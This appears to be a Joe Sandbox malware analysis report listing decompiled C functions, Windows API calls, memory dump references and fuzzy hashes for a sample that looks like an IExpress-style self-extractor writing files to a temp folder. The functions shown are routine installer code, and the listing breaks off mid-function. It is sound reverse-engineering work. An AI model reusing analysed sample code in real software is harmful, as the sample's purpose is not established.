                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ffdf4dcc975d4a2230f961cf108fed28af686200fd031dccff00952445568669
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D001A9F13002287BF32926664CD6F7B218EEBA4795F114129B7C6E25C0DBF8EC4141B9
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00107155 Relevance: 7.6, APIs: 5, Instructions: 51timethreadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00107155() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0x108004; // 0xb5a2e1bc
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0x108004 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0x108004 = _t39;
				}
				_t37 =  !_t36;
				 *0x108008 = _t37;
				return _t37;
			}











                                                                                                                                                                                                                                                0x0010715d
                                                                                                                                                                                                                                                0x00107161
                                                                                                                                                                                                                                                0x00107165
                                                                                                                                                                                                                                                0x00107178
                                                                                                                                                                                                                                                0x00107182
                                                                                                                                                                                                                                                0x0010718e
                                                                                                                                                                                                                                                0x00107197
                                                                                                                                                                                                                                                0x001071a0
                                                                                                                                                                                                                                                0x001071b1
                                                                                                                                                                                                                                                0x001071b8
                                                                                                                                                                                                                                                0x001071c4
                                                                                                                                                                                                                                                0x001071c7
                                                                                                                                                                                                                                                0x001071cb
                                                                                                                                                                                                                                                0x001071d5
                                                                                                                                                                                                                                                0x001071da
                                                                                                                                                                                                                                                0x001071da
                                                                                                                                                                                                                                                0x001071dc
                                                                                                                                                                                                                                                0x001071dc
                                                                                                                                                                                                                                                0x001071e2
                                                                                                                                                                                                                                                0x001071e5
                                                                                                                                                                                                                                                0x001071ee

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00107182
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00107191
                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0010719A
                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 001071A3
                                                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 001071B8
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1445889803-0
                                                                                                                                                                                                                                                • Opcode ID: 7156c22a44a44c4260ac0ff9746be96d334b50d84711a95d76783070207f6656
                                                                                                                                                                                                                                                • Instruction ID: e9b5389372caa7951ba0b9e8e03e247310f3eb472c2cbc56d65c5f946fc9bfaf
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7156c22a44a44c4260ac0ff9746be96d334b50d84711a95d76783070207f6656
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3113A71D05208DBCB10DFB8DA48A9EBBF4FF08310FA14865E881E7294EBB09A458F45
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 001019E0 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                			E001019E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
				signed int _v8;
				char _v520;
				void* __esi;
				signed int _t11;
				void* _t14;
				void* _t23;
				void* _t27;
				void* _t33;
				struct HWND__* _t34;
				signed int _t35;

				_t33 = __edi;
				_t27 = __ebx;
				_t11 =  *0x108004; // 0xb5a2e1bc
				_v8 = _t11 ^ _t35;
				_t34 = _a4;
				_t14 = _a8 - 0x110;
				if(_t14 == 0) {
					_t32 = GetDesktopWindow();
					E001043D0(_t34, _t15);
					_v520 = 0;
					LoadStringA( *0x109a3c, _a16,  &_v520, 0x200);
					SetDlgItemTextA(_t34, 0x83f,  &_v520);
					MessageBeep(0xffffffff);
					goto L6;
				} else {
					if(_t14 != 1) {
						L4:
						_t23 = 0;
					} else {
						_t32 = _a12;
						if(_t32 - 0x83d > 1) {
							goto L4;
						} else {
							EndDialog(_t34, _t32);
							L6:
							_t23 = 1;
						}
					}
				}
				return E00106CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}













                                                                                                                                                                                                                                                0x001019e0
                                                                                                                                                                                                                                                0x001019e0
                                                                                                                                                                                                                                                0x001019eb
                                                                                                                                                                                                                                                0x001019f2
                                                                                                                                                                                                                                                0x001019f9
                                                                                                                                                                                                                                                0x001019fc
                                                                                                                                                                                                                                                0x00101a01
                                                                                                                                                                                                                                                0x00101a2a
                                                                                                                                                                                                                                                0x00101a2e
                                                                                                                                                                                                                                                0x00101a3e
                                                                                                                                                                                                                                                0x00101a4f
                                                                                                                                                                                                                                                0x00101a62
                                                                                                                                                                                                                                                0x00101a6a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00101a03
                                                                                                                                                                                                                                                0x00101a06
                                                                                                                                                                                                                                                0x00101a20
                                                                                                                                                                                                                                                0x00101a20
                                                                                                                                                                                                                                                0x00101a08
                                                                                                                                                                                                                                                0x00101a08
                                                                                                                                                                                                                                                0x00101a14
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00101a16
                                                                                                                                                                                                                                                0x00101a18
                                                                                                                                                                                                                                                0x00101a70
                                                                                                                                                                                                                                                0x00101a72
                                                                                                                                                                                                                                                0x00101a72
                                                                                                                                                                                                                                                0x00101a14
                                                                                                                                                                                                                                                0x00101a06
                                                                                                                                                                                                                                                0x00101a81

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • EndDialog.USER32(?,?), ref: 00101A18
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 00101A24
                                                                                                                                                                                                                                                • LoadStringA.USER32(?,?,00000200), ref: 00101A4F
                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00101A62
                                                                                                                                                                                                                                                • MessageBeep.USER32(000000FF), ref: 00101A6A
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1273765764-0
                                                                                                                                                                                                                                                • Opcode ID: 2dd7e1abc4968b352853cce398cae506a5d690f1622ceaff7ba30d3568e675aa
                                                                                                                                                                                                                                                • Instruction ID: f4a02202756dd9b42f7012ebe774a44626a8a3f91be202cbeca63ed47dd9926a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2dd7e1abc4968b352853cce398cae506a5d690f1622ceaff7ba30d3568e675aa
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1011ED31600259EFDB00EF68EE08AAE77B8FF09300F408150FA92935D0CBB49E81CB95
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 001063C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 88%
                                                                                                                                                                                                                                                			E001063C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
				signed int _v8;
				char _v268;
				long _v272;
				void* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				long _t28;
				struct _OVERLAPPED* _t37;
				void* _t39;
				signed int _t40;

				_t15 =  *0x108004; // 0xb5a2e1bc
				_v8 = _t15 ^ _t40;
				_v272 = _v272 & 0x00000000;
				_push(__ecx);
				_v276 = _a16;
				_t37 = 1;
				E00101781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
				E0010658A( &_v268, 0x104, _a12);
				_t28 = 0;
				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t39 != 0xffffffff) {
					_t28 = _a4;
					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
						 *0x109124 = 0x80070052;
						_t37 = 0;
					}
					CloseHandle(_t39);
				} else {
					 *0x109124 = 0x80070052;
					_t37 = 0;
				}
				return E00106CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
			}















                                                                                                                                                                                                                                                0x001063cb
                                                                                                                                                                                                                                                0x001063d2
                                                                                                                                                                                                                                                0x001063d8
                                                                                                                                                                                                                                                0x001063ea
                                                                                                                                                                                                                                                0x001063f3
                                                                                                                                                                                                                                                0x00106401
                                                                                                                                                                                                                                                0x00106402
                                                                                                                                                                                                                                                0x00106410
                                                                                                                                                                                                                                                0x00106415
                                                                                                                                                                                                                                                0x00106433
                                                                                                                                                                                                                                                0x00106438
                                                                                                                                                                                                                                                0x00106449
                                                                                                                                                                                                                                                0x00106463
                                                                                                                                                                                                                                                0x0010646d
                                                                                                                                                                                                                                                0x00106477
                                                                                                                                                                                                                                                0x00106477
                                                                                                                                                                                                                                                0x0010647a
                                                                                                                                                                                                                                                0x0010643a
                                                                                                                                                                                                                                                0x0010643a
                                                                                                                                                                                                                                                0x00106444
                                                                                                                                                                                                                                                0x00106444
                                                                                                                                                                                                                                                0x00106492

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 0010642D
                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 0010645B
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 0010647A
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 001063EB
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                                                                • API String ID: 1065093856-3290032183
                                                                                                                                                                                                                                                • Opcode ID: 4b9ce9641cb8fbc95ce85f8bd16a4382a50cd0f20e782f690ad3b47dbff49c49
                                                                                                                                                                                                                                                • Instruction ID: 6065ec78ce5324f6d8d13fd9cd4386f7199e45ab14c702dcfab1776e8c0be132
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4b9ce9641cb8fbc95ce85f8bd16a4382a50cd0f20e782f690ad3b47dbff49c49
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3821C0B1A0021CAFDB10DF25DC85FEA7368EB58314F0041A9B5C5A3280DBF45D958FA4
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 001047E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E001047E0(intOrPtr* __ecx) {
				intOrPtr _t6;
				intOrPtr _t9;
				void* _t11;
				void* _t19;
				intOrPtr* _t22;
				void _t24;
				struct HWND__* _t25;
				struct HWND__* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t33;
				void* _t34;

				_t33 = __ecx;
				_t34 = LocalAlloc(0x40, 8);
				if(_t34 != 0) {
					_t22 = _t33;
					_t27 = _t22 + 1;
					do {
						_t6 =  *_t22;
						_t22 = _t22 + 1;
					} while (_t6 != 0);
					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
					 *_t34 = _t24;
					if(_t24 != 0) {
						_t28 = _t33;
						_t19 = _t28 + 1;
						do {
							_t9 =  *_t28;
							_t28 = _t28 + 1;
						} while (_t9 != 0);
						E00101680(_t24, _t28 - _t19 + 1, _t33);
						_t11 =  *0x1091e0; // 0x2c18e20
						 *(_t34 + 4) = _t11;
						 *0x1091e0 = _t34;
						return 1;
					}
					_t25 =  *0x108584; // 0x0
					E001044B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
					LocalFree(_t34);
					L2:
					return 0;
				}
				_t26 =  *0x108584; // 0x0
				E001044B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
				goto L2;
			}















                                                                                                                                                                                                                                                0x001047e8
                                                                                                                                                                                                                                                0x001047f0
                                                                                                                                                                                                                                                0x001047f4
                                                                                                                                                                                                                                                0x0010480f
                                                                                                                                                                                                                                                0x00104811
                                                                                                                                                                                                                                                0x00104814
                                                                                                                                                                                                                                                0x00104814
                                                                                                                                                                                                                                                0x00104816
                                                                                                                                                                                                                                                0x00104817
                                                                                                                                                                                                                                                0x00104829
                                                                                                                                                                                                                                                0x0010482b
                                                                                                                                                                                                                                                0x0010482f
                                                                                                                                                                                                                                                0x0010484f
                                                                                                                                                                                                                                                0x00104852
                                                                                                                                                                                                                                                0x00104855
                                                                                                                                                                                                                                                0x00104855
                                                                                                                                                                                                                                                0x00104857
                                                                                                                                                                                                                                                0x00104858
                                                                                                                                                                                                                                                0x00104860
                                                                                                                                                                                                                                                0x00104865
                                                                                                                                                                                                                                                0x0010486a
                                                                                                                                                                                                                                                0x0010486f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00104876
                                                                                                                                                                                                                                                0x00104831
                                                                                                                                                                                                                                                0x00104841
                                                                                                                                                                                                                                                0x00104847
                                                                                                                                                                                                                                                0x0010480b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010480b
                                                                                                                                                                                                                                                0x001047f6
                                                                                                                                                                                                                                                0x00104806
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00104E6F), ref: 001047EA
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?), ref: 00104823
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00104847
                                                                                                                                                                                                                                                  • Part of subcall function 001044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00104518
                                                                                                                                                                                                                                                  • Part of subcall function 001044B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00104554
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00104851
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                                                                • API String ID: 359063898-3290032183
                                                                                                                                                                                                                                                • Opcode ID: eec4213871f931a2e336a54c2e022108b69bcc0ea0afbd26a22be2f05c2e5e98
                                                                                                                                                                                                                                                • Instruction ID: 440ebf25737c02b369272c0ae65e175c81e1814be309fbd24fdc0550bef22d8b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eec4213871f931a2e336a54c2e022108b69bcc0ea0afbd26a22be2f05c2e5e98
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC1102F5204641AFD7288F749C98F723B5AEB85310B04C91AFBC2DB681DBF58C068660
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00106517 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 77%
                                                                                                                                                                                                                                                			E00106517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
				struct HRSRC__* _t6;
				void* _t21;
				struct HINSTANCE__* _t23;
				int _t24;

				_t23 =  *0x109a3c; // 0x100000
				_t6 = FindResourceA(_t23, __edx, 5);
				if(_t6 == 0) {
					L6:
					E001044B9(0, 0x4fb, 0, 0, 0x10, 0);
					_t24 = _a16;
				} else {
					_t21 = LoadResource(_t23, _t6);
					if(_t21 == 0) {
						goto L6;
					} else {
						if(_a12 != 0) {
							_push(_a12);
						} else {
							_push(0);
						}
						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
						FreeResource(_t21);
						if(_t24 == 0xffffffff) {
							goto L6;
						}
					}
				}
				return _t24;
			}







                                                                                                                                                                                                                                                0x0010651f
                                                                                                                                                                                                                                                0x0010652a
                                                                                                                                                                                                                                                0x00106534
                                                                                                                                                                                                                                                0x0010656b
                                                                                                                                                                                                                                                0x00106577
                                                                                                                                                                                                                                                0x0010657c
                                                                                                                                                                                                                                                0x00106536
                                                                                                                                                                                                                                                0x0010653e
                                                                                                                                                                                                                                                0x00106542
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00106544
                                                                                                                                                                                                                                                0x00106547
                                                                                                                                                                                                                                                0x0010654c
                                                                                                                                                                                                                                                0x00106549
                                                                                                                                                                                                                                                0x00106549
                                                                                                                                                                                                                                                0x00106549
                                                                                                                                                                                                                                                0x0010655e
                                                                                                                                                                                                                                                0x00106560
                                                                                                                                                                                                                                                0x00106569
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00106569
                                                                                                                                                                                                                                                0x00106542
                                                                                                                                                                                                                                                0x00106587

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(00100000,000007D6,00000005), ref: 0010652A
                                                                                                                                                                                                                                                • LoadResource.KERNEL32(00100000,00000000,?,?,00102EE8,00000000,001019E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00106538
                                                                                                                                                                                                                                                • DialogBoxIndirectParamA.USER32(00100000,00000000,00000547,001019E0,00000000), ref: 00106557
                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,?,?,00102EE8,00000000,001019E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00106560
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1214682469-0
                                                                                                                                                                                                                                                • Opcode ID: 955a1deb99a2aa4f3f600020cfd266d2cded678af96ddbbe99ca20d10a01d3ae
                                                                                                                                                                                                                                                • Instruction ID: ef1e26d9f9ec8275b32deae3e853cb88d4ef22cb569a945f8f663f14c2d93b8b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 955a1deb99a2aa4f3f600020cfd266d2cded678af96ddbbe99ca20d10a01d3ae
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE01D672200619BBDB105F69AC48DBB7A6CEF897A1F414125FE90E3194DBF18D6086A1
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00103680 Relevance: 6.1, APIs: 4, Instructions: 51windowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00103680(void* __ecx) {
				void* _v8;
				struct tagMSG _v36;
				int _t8;
				struct HWND__* _t16;

				_v8 = __ecx;
				_t16 = 0;
				while(1) {
					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
					if(_t8 == 0) {
						break;
					}
					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
						continue;
					} else {
						do {
							if(_v36.message != 0x12) {
								DispatchMessageA( &_v36);
							} else {
								_t16 = 1;
							}
							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
						} while (_t8 != 0);
						if(_t16 == 0) {
							continue;
						}
					}
					break;
				}
				return _t8;
			}







                                                                                                                                                                                                                                                0x0010368c
                                                                                                                                                                                                                                                0x0010368f
                                                                                                                                                                                                                                                0x00103691
                                                                                                                                                                                                                                                0x0010369f
                                                                                                                                                                                                                                                0x001036a7
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001036ba
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001036bc
                                                                                                                                                                                                                                                0x001036bc
                                                                                                                                                                                                                                                0x001036c0
                                                                                                                                                                                                                                                0x001036cb
                                                                                                                                                                                                                                                0x001036c2
                                                                                                                                                                                                                                                0x001036c4
                                                                                                                                                                                                                                                0x001036c4
                                                                                                                                                                                                                                                0x001036da
                                                                                                                                                                                                                                                0x001036e0
                                                                                                                                                                                                                                                0x001036e6
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001036e6
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001036ba
                                                                                                                                                                                                                                                0x001036ed

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0010369F
                                                                                                                                                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001036B2
                                                                                                                                                                                                                                                • DispatchMessageA.USER32(?), ref: 001036CB
                                                                                                                                                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001036DA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2776232527-0
                                                                                                                                                                                                                                                • Opcode ID: 4f365077b17e631a2b1db2d66656333e6d1b281cd5d3295e5e22e5b0079c0fa2
                                                                                                                                                                                                                                                • Instruction ID: 243e80156f75c1db61751185d3369309f8e294b78e56abbc695c0716d87042f5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f365077b17e631a2b1db2d66656333e6d1b281cd5d3295e5e22e5b0079c0fa2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8301677290025977DB305BA65C4CEEB767CEBC6B10F140119F955E21C0D6F1C784C6B1
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 001065E8 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 72%
                                                                                                                                                                                                                                                			E001065E8(char* __ecx) {
				char _t3;
				char _t10;
				char* _t12;
				char* _t14;
				char* _t15;
				CHAR* _t16;

				_t12 = __ecx;
				_t15 = __ecx;
				_t14 =  &(__ecx[1]);
				_t10 = 0;
				do {
					_t3 =  *_t12;
					_t12 =  &(_t12[1]);
				} while (_t3 != 0);
				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
				while(1) {
					_t16 = CharPrevA(_t15, ??);
					if(_t16 <= _t15) {
						break;
					}
					if( *_t16 == 0x5c) {
						L7:
						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
							_t16 = CharNextA(_t16);
						}
						 *_t16 = _t10;
						_t10 = 1;
					} else {
						_push(_t16);
						continue;
					}
					L11:
					return _t10;
				}
